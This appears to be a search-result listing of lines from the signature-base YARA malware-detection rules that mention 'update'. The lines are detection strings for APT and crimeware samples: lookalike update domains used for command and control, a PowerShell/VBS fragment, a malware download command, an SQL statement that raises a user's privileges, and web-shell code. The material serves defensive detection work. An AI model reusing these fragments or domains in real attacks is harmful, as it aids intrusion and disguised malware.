signature-base apt_oilrig.yar $x1 = “wss.Run "powershell.exe " & Chr(34) & "& {(Get-Content $env:Public\Libraries\update.vbs) -replace ‘__’,(Get-Random) | Set-C” ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $x2 = “Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\update.vbs")” fullword ascii CC BY-NC 4.0
signature-base apt_op_cloudhopper.yar $s2 = “rundll32.exe "%s", UnInstall /update %s” fullword wide CC BY-NC 4.0
signature-base apt_putterpanda.yar $s0 = “http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?” fullword ascii /* PEStudio Blacklist: strings / / score: ‘28.01’ */ CC BY-NC 4.0
signature-base apt_putterpanda.yar $s1 = “http://update.konamidata.com/test/zl/sophos/td/index.dat?” fullword ascii /* PEStudio Blacklist: strings / / score: ‘28.01’ */ CC BY-NC 4.0
signature-base apt_reaver_sunorcal.yar $s3 = “~Update.lnk” fullword ascii CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $ = “App.Update” CC BY-NC 4.0
signature-base apt_sandworm_centreon.yar $typo3 = “Error.Can’t update app! Not enough update archive.” CC BY-NC 4.0
signature-base apt_sednit_delphidownloader.yar Reference: https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ CC BY-NC 4.0
signature-base apt_sednit_delphidownloader.yar reference = “https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/” CC BY-NC 4.0
signature-base apt_snaketurla_osx.yar $s2 = “$TARGET_PATH2/com.adobe.update.plist” ascii CC BY-NC 4.0
signature-base apt_sofacy_xtunnel_bundestag.yar $s6 = “.update.adobeincorp.com” fullword ascii CC BY-NC 4.0
signature-base apt_ta17_293A.yar $s1 = “-t time - use the time specified to update the access and modification times” fullword ascii CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar description = “Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s0 = “update.hancominc.com” fullword wide CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s5 = “binary.update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s25 = “long.update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s26 = “longlong.update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s28 = “longshadow.update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s29 = “longykcai.update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s30 = “lostself.update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s38 = “mtc.update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s47 = “shadow.update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s52 = “update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s53 = “update.deepsoftupdate.com” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s54 = “update.hancominc.com” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s55 = “update.micr0soft.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s56 = “update.pchomeserver.com” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s65 = “www.trendmicro-update.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s66 = “www.update-onlines.org” CC BY-NC 4.0
signature-base apt_threatgroup_3390.yar $s68 = “ykcai.update-onlines.org” CC BY-NC 4.0
signature-base apt_turbo_campaign.yar $sc_2 = “update.microsoft.com” wide ascii CC BY-NC 4.0
signature-base apt_turla_mosquito.yar $s4 = “Microsoft Update” fullword wide CC BY-NC 4.0
signature-base apt_waterbear.yar $s1 = “Update.dll” fullword ascii CC BY-NC 4.0
signature-base apt_waterbear.yar $b2 = “Update.dll” fullword ascii CC BY-NC 4.0
signature-base apt_wildneutron.yar $s3 = “Driver Update and remove for Windows x64 or x86_32” fullword wide /* PEStudio Blacklist: strings / / score: ‘17.00’ */ CC BY-NC 4.0
signature-base apt_wildneutron.yar $s4 = “Realtek HD Audio Update and remove driver Tool” fullword wide /* PEStudio Blacklist: strings / / score: ‘16.00’ */ CC BY-NC 4.0
signature-base apt_winnti.yar description = “Detects a Winnti malware - Update.dll” CC BY-NC 4.0
signature-base apt_winnti.yar $s2 = “Update.dll” fullword ascii CC BY-NC 4.0
signature-base apt_zxshell.yar $x3 = “downfile -d c:\windows\update.exe” fullword ascii CC BY-NC 4.0
signature-base cn_pentestset_tools.yar $s1 = “update [dv_user] set usergroupid=1 where userid=2;–” fullword ascii /* PEStudio Blacklist: strings */ CC BY-NC 4.0
signature-base crime_bad_patch.yar $x8 = “ :Old - update patch and check anti-virus.. “ fullword wide CC BY-NC 4.0
signature-base crime_fireball.yar $s6 = “UPDATE OVERWRITE” fullword wide CC BY-NC 4.0
signature-base crime_icedid.yar $string6 = “update” fullword CC BY-NC 4.0
signature-base crime_malware_set_oct16.yar $s4 = “VXBkYXRlIEVSUk9S” fullword ascii /* base64 encoded string ‘Update ERROR’ */ CC BY-NC 4.0
signature-base gen_cn_hacktools.yar $s1 = “@members.3322.net/dyndns/update?system=dyndns&hostname=” fullword ascii CC BY-NC 4.0
signature-base gen_cn_hacktools.yar $s3 = “@ddns.oray.com/ph/update?hostname=” fullword ascii CC BY-NC 4.0
signature-base gen_crunchrat.yar $s5 = “/update.php” fullword wide CC BY-NC 4.0
signature-base gen_malware_set_qa.yar description = “VT Research QA uploaded malware - file update.exe” CC BY-NC 4.0
signature-base gen_malware_set_qa.yar $x6 = “BTRESULTUpdate from URL|Update : File Downloaded , Executing new one in temp dir…|” fullword ascii CC BY-NC 4.0
signature-base gen_merlin_agent.yar $x2 = “[-]Connecting to web server at %s to update agent configuration information.” CC BY-NC 4.0
signature-base mal_codecov_hack.yar reference = “https://about.codecov.io/security-update/” CC BY-NC 4.0
signature-base mal_passwordstate_backdoor.yar reference = “https://thehackernews.com/2021/04/passwordstate-password-manager-update.html” CC BY-NC 4.0
signature-base spy_equation_fiveeyes.yar /* EquationDrug Update 11.03.2015 - http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/ */ CC BY-NC 4.0
signature-base spy_regin_fiveeyes.yar /* Update 27.11.14 */ CC BY-NC 4.0
signature-base thor-hacktools.yar We will frequently update this file with new rules rated TLP:WHITE CC BY-NC 4.0
signature-base thor-webshells.yar /* Update from hackers tool pack */ CC BY-NC 4.0
signature-base thor-webshells.yar /* PHP Webshell Update - August 2014 - deducted from https://github.com/JohnTroony/php-webshells */ CC BY-NC 4.0
signature-base thor-webshells.yar $s3 = “ExeNewRs.CommandText = "UPDATE " & tablename & " SET " & ExeNewRsValues & " WHER” CC BY-NC 4.0
signature-base vul_dell_bios_upd_driver.yar description = “Detects vulnerable DELL BIOS update driver that allows privilege escalation as reported in CVE-2021-21551 - DBUtil_2_3.Sys - note: it’s usual location is in the C:\Windows\Temp folder” CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar $str4 = “Winds Update” nocase wide ascii fullword CC BY-NC 4.0
signature-base yara_mixed_ext_vars.yar uint16(0) == 0x5a4d and filesize < 1000KB and all of them and filename == “update.exe” CC BY-NC 4.0

MIT License. Copyright (c) 2020-2021 Strontic.